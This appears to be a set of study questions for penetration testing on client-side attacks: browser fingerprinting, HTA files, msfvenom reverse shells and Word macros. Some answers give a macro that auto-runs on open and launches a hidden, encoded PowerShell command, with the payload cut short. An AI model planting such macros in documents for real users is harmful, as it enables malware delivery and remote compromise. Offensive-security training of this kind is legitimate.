What tool is used for web browser fingerprinting?
Fingerprintjs2
How do we get the broswer fingerprint on a victim machine?
How do we get the output of the victim browser fingerprint saved to the attacking machine?
What is a .hta file?
How can HTA be used to execute shell commands?
How to create an HTA attack?
What command in PowerShell prevents the PowerShell user profile from loading?
- - -NoProfile
What command in PowerShell prevents PowerShell from creating a window on the user’s desktop?
- - -WindowStyle hidden
What are the steps to get a reverse shell on a victim machine with a .hta file created in Msfvenom?
What is one of the oldest and best-known client-side software attack vectors?
Microsoft Word Macro
What is a Macro?
What is VBA?
- Fully functional scripting language with full access to ActiveX objects and the WScript Host
What is similar to a ‘function’ in VBA?
- the difference between a Sub procedure and Function is that Sub procedures cannot be used in expressions
How is a macro inserted into a Word or Excel document?
Create a simple macro that opens cmd.exe
– Sub MyMacro()
– CreateObject(“Wscript.Shell”).Run “cmd”
– End Sub
What macro procedure call a custom procedure when a new document is created?
Sub AutoOpen()
What macro procedure call a custom procedure when an already-open document is reopened?
Sub Document_Open()
Which Word extensions support embedded macros?
How can we use a macro to get a reverse shell?
What would the MyMacro process look like with the Dim variable and Powershell command?
– Str = “powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZ”
– Str = Str + “QB3AC0A…”
– Str = Str + “TAHAAcgBlAGEAb…”
…….
– Str = Str + “QA=”
– CreateObject(“Wscript.Shell’”).Run Str
– End Sub
What is OLE and how can you leverage it as a Client Side attack?
How do you craft an OLE attack?
What is Protected View?
What may be a better vector than Word and Excel? Why?